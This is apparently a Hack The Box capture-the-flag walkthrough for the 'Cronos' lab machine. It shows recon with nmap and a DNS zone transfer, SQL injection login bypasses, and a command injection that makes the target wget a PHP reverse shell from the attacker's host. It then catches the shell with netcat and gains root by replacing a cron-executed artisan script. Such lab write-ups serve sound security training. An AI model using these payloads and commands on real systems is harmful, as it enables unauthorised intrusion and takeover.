Today we are going to solve another CTF challenge “Cronos” which is available online for those who want to increase their skill in penetration testing. Cronos is retried vulnerable lab presented by Hack the Box.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

$ nmap -T4 -A -sV 10.10.10.13

Starting Nmap 7.50 ( https://nmap.org ) at 2018-11-27 14:50 IST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (EdDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds

It has DNS server
Add cronos.htb on /etc/hosts
Dig

root@kali:/htb/cronos# dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.11.5-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 33 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Nov 27 14:41:37 EST 2018
;; XFR size: 7 records (messages 1, bytes 203)

Visit http://admin.cronos.htb.

There’s a SQLi in the username field. Enter admin’– – in username field. (or enter ‘ or 1=1#  in username field.)
The input field in welcome.php is vulnerable to command injection.

Create php-reverse-shell payload and upload it to the server.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

root@kali:/htb/cronos# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.13 - - [27/Nov/2018 12:57:29] "GET /r2.txt HTTP/1.1" 200 -
In the input field of welcome.php enter :
8.8.8.8; pwd
8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/
8.8.8.8; cp r2.txt puckie.php

In the input field of welcome.php enter :
8.8.8.8; pwd
8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/ 
8.8.8.8; cp r2.txt puckie.php

We need to upload txt because we cannot upload php. Hence first upload txt and then rename to .php
Now start 1st netcat listener and get the shell. by browsing to http://admin.cronos.htb/puckie.php

root@kali:~/Desktop# nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.19] from cronos.htb [10.10.10.13] 45074
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
21:15:46 up 1 day, 16:28, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@cronos:/$
check /etc/crontab
$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

The last scheduled activity executes a process called artisan locate in /var/www/laravel
When we check the file’s permissions:

100755/rwxr-xr-x 1646 fil 2017-04-09 05:30:09 +0530 artisan

So we can replace this file with our payload.
Create a new payload and upload it here.
Rename it to artisan
Make it executable by chmod +x artisan
Put this 2nd netcat listener to background and listen for the new connection

root@kali:~/Desktop# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.19] from cronos.htb [10.10.10.13] 37984
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 21:52:01 up 1 day, 17:04,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
#

Wait for 1 minute as the executes every one minute
You’ll get root access

Author: Jacco Straathof